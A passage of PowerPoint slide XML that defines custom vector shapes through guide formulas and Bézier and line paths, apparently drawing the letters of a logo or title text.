                      <a:pt x="16" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="1"/>
                      <a:pt x="19" y="2"/>
                      <a:pt x="2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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5837238" y="1352550"/>
                <a:ext cx="22225" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 11"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 11"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 11"/>
                  <a:gd name="T5" fmla="*/ 18 h 20"/>
                  <a:gd name="T6" fmla="*/ 7 w 11"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 11"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 9 w 11"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 11"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 5 w 11"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 2 w 11"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 1 w 11"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 2 w 11"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 3 w 11"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 11"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 8 w 11"/>
                  <a:gd name="T27" fmla="*/ 0 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 11"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 9 w 11"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 8 w 11"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 11"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 11"/>
                  <a:gd name="T37" fmla="*/ 2 h 20"/>
                  <a:gd name="T38" fmla="*/ 3 w 11"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 3 w 11"/>
                  <a:gd name="T41" fmla="*/ 5 h 20"/>
                  <a:gd name="T42" fmla="*/ 4 w 11"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 11"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 10 w 11"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 11 w 11"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 11"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 11"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 3 w 11"/>
                  <a:gd name="T55" fmla="*/ 19 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 11"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="6" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="7" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="2" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="5"/>
                      <a:pt x="1" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="3" y="3"/>
                      <a:pt x="3" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="7"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="10" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="16"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="3" y="20"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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126"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5934075" y="1347788"/>
                <a:ext cx="2063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27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5907088" y="1346200"/>
                <a:ext cx="50800" cy="49213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 32"/>
                  <a:gd name="T1" fmla="*/ 31 h 31"/>
                  <a:gd name="T2" fmla="*/ 0 w 32"/>
                  <a:gd name="T3" fmla="*/ 31 h 31"/>
                  <a:gd name="T4" fmla="*/ 0 w 32"/>
                  <a:gd name="T5" fmla="*/ 0 h 31"/>
                  <a:gd name="T6" fmla="*/ 32 w 32"/>
                  <a:gd name="T7" fmla="*/ 0 h 31"/>
                  <a:gd name="T8" fmla="*/ 32 w 32"/>
                  <a:gd name="T9" fmla="*/ 31 h 31"/>
                  <a:gd name="T10" fmla="*/ 4 w 32"/>
                  <a:gd name="T11" fmla="*/ 27 h 31"/>
                  <a:gd name="T12" fmla="*/ 29 w 32"/>
                  <a:gd name="T13" fmla="*/ 27 h 31"/>
                  <a:gd name="T14" fmla="*/ 29 w 32"/>
                  <a:gd name="T15" fmla="*/ 4 h 31"/>
                  <a:gd name="T16" fmla="*/ 4 w 32"/>
                  <a:gd name="T17" fmla="*/ 4 h 31"/>
                  <a:gd name="T18" fmla="*/ 4 w 32"/>
                  <a:gd name="T19"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1">
                    <a:moveTo>
                      <a:pt x="32" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="31"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4"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28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5370513" y="1185863"/>
                <a:ext cx="25400" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 12"/>
                  <a:gd name="T5" fmla="*/ 19 h 20"/>
                  <a:gd name="T6" fmla="*/ 8 w 12"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 10 w 12"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 12"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 6 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 3 w 12"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 4 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 12"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 1 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 10 w 12"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 8 w 12"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 12"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 12"/>
                  <a:gd name="T37" fmla="*/ 3 h 20"/>
                  <a:gd name="T38" fmla="*/ 4 w 12"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 4 w 12"/>
                  <a:gd name="T41" fmla="*/ 6 h 20"/>
                  <a:gd name="T42" fmla="*/ 5 w 12"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 12"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 11 w 12"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 12 w 12"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 12"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 12"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 3 w 12"/>
                  <a:gd name="T55" fmla="*/ 20 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 12"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="8" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="10" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="6" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="3" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="7"/>
                      <a:pt x="2" y="6"/>
                      <a:pt x="2" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="4"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="9" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="1"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="3"/>
                      <a:pt x="4" y="4"/>
                      <a:pt x="4" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="5" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="7"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="12" y="14"/>
                      <a:pt x="12" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="8" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5399088" y="1185863"/>
                <a:ext cx="22225" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 14 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 26"/>
                  <a:gd name="T8" fmla="*/ 8 w 14"/>
                  <a:gd name="T9" fmla="*/ 2 h 26"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 5 w 14"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 5 w 14"/>
                  <a:gd name="T15" fmla="*/ 2 h 26"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17"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6">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5"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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5424488" y="1185863"/>
                <a:ext cx="38100" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                  <a:gd name="T2" fmla="*/ 24 w 24"/>
                  <a:gd name="T3" fmla="*/ 26 h 26"/>
                  <a:gd name="T4" fmla="*/ 22 w 24"/>
                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                  <a:gd name="T6" fmla="*/ 16 w 24"/>
                  <a:gd name="T7" fmla="*/ 18 h 26"/>
                  <a:gd name="T8" fmla="*/ 6 w 24"/>
                  <a:gd name="T9" fmla="*/ 18 h 26"/>
                  <a:gd name="T10" fmla="*/ 2 w 24"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 0 w 24"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 11 w 24"/>
                  <a:gd name="T15" fmla="*/ 0 h 26"/>
                  <a:gd name="T16" fmla="*/ 13 w 24"/>
                  <a:gd name="T17" fmla="*/ 0 h 26"/>
                  <a:gd name="T18" fmla="*/ 11 w 24"/>
                  <a:gd name="T19" fmla="*/ 6 h 26"/>
                  <a:gd name="T20" fmla="*/ 7 w 24"/>
                  <a:gd name="T21" fmla="*/ 15 h 26"/>
                  <a:gd name="T22" fmla="*/ 16 w 24"/>
                  <a:gd name="T23" fmla="*/ 15 h 26"/>
                  <a:gd name="T24" fmla="*/ 11 w 24"/>
                  <a:gd name="T2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6">
                    <a:moveTo>
                      <a:pt x="13" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="15"/>
                    </a:ln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31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5464175" y="1185863"/>
                <a:ext cx="23813" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 2 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 2 h 26"/>
                  <a:gd name="T8" fmla="*/ 8 w 15"/>
                  <a:gd name="T9" fmla="*/ 2 h 26"/>
                  <a:gd name="T10" fmla="*/ 8 w 15"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 6 w 15"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 6 w 15"/>
                  <a:gd name="T15" fmla="*/ 2 h 26"/>
                  <a:gd name="T16" fmla="*/ 0 w 15"/>
                  <a:gd name="T17"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6">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5491163" y="1185863"/>
                <a:ext cx="26988" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 13"/>
                  <a:gd name="T1" fmla="*/ 0 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 13"/>
                  <a:gd name="T3" fmla="*/ 0 h 20"/>
                  <a:gd name="T4" fmla="*/ 2 w 13"/>
                  <a:gd name="T5" fmla="*/ 12 h 20"/>
                  <a:gd name="T6" fmla="*/ 2 w 13"/>
                  <a:gd name="T7" fmla="*/ 15 h 20"/>
                  <a:gd name="T8" fmla="*/ 3 w 13"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 5 w 13"/>
                  <a:gd name="T11" fmla="*/ 18 h 20"/>
                  <a:gd name="T12" fmla="*/ 7 w 13"/>
                  <a:gd name="T13" fmla="*/ 19 h 20"/>
                  <a:gd name="T14" fmla="*/ 9 w 13"/>
                  <a:gd name="T15" fmla="*/ 18 h 20"/>
                  <a:gd name="T16" fmla="*/ 10 w 13"/>
                  <a:gd name="T17" fmla="*/ 17 h 20"/>
                  <a:gd name="T18" fmla="*/ 11 w 13"/>
                  <a:gd name="T19" fmla="*/ 15 h 20"/>
                  <a:gd name="T20" fmla="*/ 11 w 13"/>
                  <a:gd name="T21" fmla="*/ 12 h 20"/>
                  <a:gd name="T22" fmla="*/ 11 w 13"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 13 w 13"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 13 w 13"/>
                  <a:gd name="T27" fmla="*/ 12 h 20"/>
                  <a:gd name="T28" fmla="*/ 13 w 13"/>
                  <a:gd name="T29" fmla="*/ 16 h 20"/>
                  <a:gd name="T30" fmla="*/ 11 w 13"/>
                  <a:gd name="T31" fmla="*/ 19 h 20"/>
                  <a:gd name="T32" fmla="*/ 7 w 13"/>
                  <a:gd name="T33" fmla="*/ 20 h 20"/>
                  <a:gd name="T34" fmla="*/ 3 w 13"/>
                  <a:gd name="T35" fmla="*/ 19 h 20"/>
                  <a:gd name="T36" fmla="*/ 1 w 13"/>
                  <a:gd name="T37" fmla="*/ 16 h 20"/>
                  <a:gd name="T38" fmla="*/ 0 w 13"/>
                  <a:gd name="T39" fmla="*/ 12 h 20"/>
                  <a:gd name="T40" fmla="*/ 0 w 13"/>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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="12"/>
                      <a:pt x="2" y="12"/>
                      <a:pt x="2" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="14"/>
                      <a:pt x="2" y="14"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="16"/>
                      <a:pt x="3" y="16"/>
                      <a:pt x="3" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="5" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="18"/>
                      <a:pt x="6" y="19"/>
                      <a:pt x="7" y="19"/>
                    </a:cubicBezTo>
